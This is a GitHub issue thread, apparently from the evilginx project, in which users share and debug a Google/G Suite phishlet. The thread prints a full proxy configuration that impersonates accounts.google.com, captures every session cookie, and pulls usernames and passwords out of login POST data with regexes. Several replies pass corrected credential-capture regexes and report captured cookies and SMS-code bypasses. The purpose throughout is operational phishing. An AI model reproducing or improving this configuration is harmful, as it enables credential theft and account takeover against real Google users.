
gsuite

Open Ineed2p247 opened this issue 2 years ago • 31 comments

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Screenshot 2022-09-09 230107

The Gsuite phishlet does not capture mail/pass, only cookies. What am I missing? Please advise.

Ineed2p247 avatar Sep 09 '22 15:09 Ineed2p247

What Gsuite Phishlets Are You Using?

sebastiangonzalezbotasi avatar Sep 17 '22 14:09 sebastiangonzalezbotasi

It is because of the v3 upgrade by Google.

ssl-user-en avatar Sep 19 '22 07:09 ssl-user-en

@ssl-user-en can you share your google.yaml for study?

globally0x avatar Sep 19 '22 07:09 globally0x

@Ineed2p247 can you share your Gsuite Phishlets?

globally0x avatar Sep 19 '22 07:09 globally0x

@globally0x

author: '@ineed2p247' min_ver: '2.3.0'

proxy_hosts:

  • {phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,}
  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
  • {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true}
  • {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false}
  • {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false}

sub_filters:

  • {triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
  • {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']}

auth_tokens:

  • domain: '.google.com' keys: [".*,regexp"]
  • domain: 'accounts.google.com' keys: [".*,regexp"]
  • domain: 'accounts.google.bg' keys: [".*,regexp"]
  • domain: 'myaccount.google.com' keys: [".*,regexp"]
  • domain: 'mail.google.com' keys: [".*,regexp"]

credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

  • '/CheckCookie'
  • '/_/AccountSettingsUi/browserinfo'

login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

  • path: '/_/signin/sl/challenge' search:
    • {key: 'f.req', search: '.*'}
    • {key: 'continue', search: '.*'} force:
    • {key: 'continue', value: ''} type: 'post'``

Ineed2p247 avatar Sep 19 '22 10:09 Ineed2p247

@ssl-user-en What's the new regex to grab the password?

Ineed2p247 avatar Sep 19 '22 10:09 Ineed2p247

@Ineed2p247 Thanks a lot, I will test now!

globally0x avatar Sep 19 '22 12:09 globally0x

@Ineed2p247 cookie caught. Great work!

globally0x avatar Sep 19 '22 12:09 globally0x

@globally0x What's the new regex to grab the password?

Ineed2p247 avatar Sep 19 '22 16:09 Ineed2p247

@globally0x What's the new regex to grab the password?

'null,[\"([^"]*)\",'

globally0x avatar Sep 20 '22 00:09 globally0x

'null,[\"([^"]*)\",' Tests good in Chrome on Windows. It cannot be used to capture username & password on Android.

globally0x avatar Sep 20 '22 00:09 globally0x

Hello. Has it happened to you when using Google phishlets that, after adding users, password and receiving a second validation (code to the cell phone), after clicking on "next" it shows you this?

Captura de pantalla 2022-09-21 a la(s) 20 58 25

sebastiangonzalezbotasi avatar Sep 22 '22 00:09 sebastiangonzalezbotasi

@Ineed2p247 could you share the full code of your phishlet, please? Also, I'm getting "error on line 7".

about20kg avatar Sep 23 '22 15:09 about20kg

@globally0x What's the new regex to grab the password?

'null,["([^"]*)",'

The main issue is it's not getting user and pass, and this code shows an error during importation. Does anyone have an idea of the correct details for getting the user and pass?

lhost25 avatar Sep 26 '22 01:09 lhost25

@lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'

globally0x avatar Sep 28 '22 12:09 globally0x

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

Thanks, sir, for the details, but I keep getting this error message after those credentials.

Screenshot 2022-09-29 at 12 57 51 AM

lhost25 avatar Sep 29 '22 00:09 lhost25

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

Kevin3-00 avatar Sep 29 '22 20:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

joemorning2 avatar Sep 30 '22 07:09 joemorning2

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can't load that phishlets to other phishlets folder

Kevin3-00 avatar Sep 30 '22 15:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine. You posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride.

joemorning2 avatar Sep 30 '22 15:09 joemorning2

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine. You posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride. author: '@Ineed2p247' min_ver: '2.3.0'

proxy_hosts:

{phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true} {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false} sub_filters:

{triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']} auth_tokens:

domain: '.google.com' keys: [".,regexp"] domain: 'accounts.google.com' keys: [".,regexp"] domain: 'accounts.google.bg' keys: [".,regexp"] domain: 'myaccount.google.com' keys: [".,regexp"] domain: 'mail.google.com' keys: [".*,regexp"] credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'

auth_urls:

'/CheckCookie' '/_/AccountSettingsUi/browserinfo' login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:

path: '/_/signin/sl/challenge' search: {key: 'f.req', search: '.'} {key: 'continue', search: '.'} force: {key: 'continue', value: ''} type: 'post'``

Take a look at this phishlet after making corrections based on @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post' When you upload it, it will get uploaded and will show you there's a problem on line 7, which is what you are seeing in the photo.

Kevin3-00 avatar Sep 30 '22 16:09 Kevin3-00

  • {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}

{phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} This line has a problem in the phishlet.

Kevin3-00 avatar Sep 30 '22 16:09 Kevin3-00

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

image This is what I continue to get

What exactly do you want to achieve with the error message you are getting?

It means you can load that phishlets to other phishlets folder

Imagine. You posted a picture without being specific about the assistance you need. If I don't know and you know how to, why seek help here?

I will advise you to be specific so that people can help you. Your picture did not point out the help you need.

Human beings with their pride. https://github.com/joemorning2

image Seriously? You joined GitHub just yesterday and your first post would be to hide as some expert on evilginx, or I guess you were here before with a different ID and got blocked. Before accusing me of being prideful, learn first. Since I showed you what the problem was, you returned to your shell and hid, isn't it? Give me a break and allow people with know-how to contribute.

Kevin3-00 avatar Sep 30 '22 17:09 Kevin3-00

Who has a working Google phishlet

rhks avatar Oct 01 '22 19:10 rhks

@lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'

This doesn't seem to work

rhks avatar Oct 01 '22 19:10 rhks

@rhks yes it's not working

Ineed2p247 avatar Oct 01 '22 20:10 Ineed2p247

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Ineed2p247 avatar Oct 01 '22 20:10 Ineed2p247

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Please, can we also make it work? Presently it is not capturing username but pass and cookies.

Kevin3-00 avatar Oct 01 '22 21:10 Kevin3-00

Thanks to y'all for the contribution, I have a working phishlet now. I will be closing my comment.

Do you mind sharing your working phishlet

rhks avatar Oct 02 '22 16:10 rhks

You are using the default configuration and those no longer work; you must make the changes and adapt them. Find me on Telegram cryptopro99

He is a ripper. Don't trust him. He asks you for 100$, then after he blocks you.

ProfessorRS avatar Oct 03 '22 21:10 ProfessorRS

Hello everyone, I'm having a problem and I don't quite understand what is happening. I am using this version of the phishlet. Running the program in localhost mode, all three steps work very well: a) user b) password c) code by SMS d) cookie capture. The problem occurs when I run the program in real mode on a server. Although I go through the steps of user, password and code by SMS, on the last accept it throws the following error:

Captura de pantalla 2022-10-12 a la(s) 20 01 07

sebastiangonzalezbotasi avatar Oct 12 '22 23:10 sebastiangonzalezbotasi

Hello! If you were already able to resolve your doubts and achieve your goals, close the issue so that we know which ones are pending.

Thank you!

Support-1535 avatar Oct 26 '22 22:10 Support-1535